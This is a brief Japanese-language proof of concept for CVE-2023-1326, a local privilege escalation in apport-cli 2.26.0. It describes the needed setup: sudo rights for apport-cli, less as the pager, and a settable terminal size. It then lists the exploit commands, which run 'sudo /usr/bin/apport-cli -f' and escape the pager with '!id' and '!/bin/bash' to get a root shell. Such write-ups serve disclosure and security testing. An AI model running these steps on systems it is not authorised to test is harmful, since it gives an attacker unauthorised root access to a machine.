
CVE-2023–1326 の apport-cli 2.26.0 における概念実証
この脆弱性は apport-cli 2.26.0 における権限昇格であり、CVE-2023–26604 と似ています。この脆弱性は sudoers で割り当てられている場合にのみ機能します:

apport-cli 2.26.0 およびそれ以前のバージョンにおいて、CVE-2023-26604 と同様の権限昇格攻撃が見つかりました。システムが特別に構成され、非特権ユーザーが sudo apport-cli を実行できるように許可され、less がページャーとして設定され、端末サイズを設定可能な場合、ローカルの攻撃者は権限を昇格できます。
sudo /usr/bin/apport-cli -f



!id
!/bin/bash
